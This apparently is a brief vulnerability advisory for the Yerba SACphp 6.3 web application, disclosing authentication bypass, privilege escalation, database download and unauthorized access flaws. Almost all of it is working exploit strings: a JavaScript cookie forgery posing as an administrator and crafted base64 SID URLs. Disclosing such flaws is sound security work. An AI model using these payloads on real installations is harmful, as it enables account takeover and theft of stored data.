Yerba SACphp 6.3 Multliple Remote Vulnerabilities

Yerba SACphp 6.3 Multliple Remote Vulnerabilities

Attackers can use a browser to exploit this issue.

The following example URIs and JavaScript are available:

Authentication bypass:
javascript:document.cookie="galleta[sesion]=MToxOkFkbWluaXN0cmFkb3IgZGVsIFNpc3RlbWE6Jw=="

Privilege-escalation
http://www.example.com/index.php?SID=[path (base64 encoded)]

Database Download
http://www.example.com/index.php?SID=Jm9kbGFwc2VyPXhmJmFtZXRzaXM9cG9tJm5pbWRBQkR5PWRvbQ==

Unauthorized access:
http://www.example.com/index.php?SID=JnJhZ2VyZ2E9eGYmYW1ldHNpcz1wb20mc29pcmF1c1V5PWRvbQ==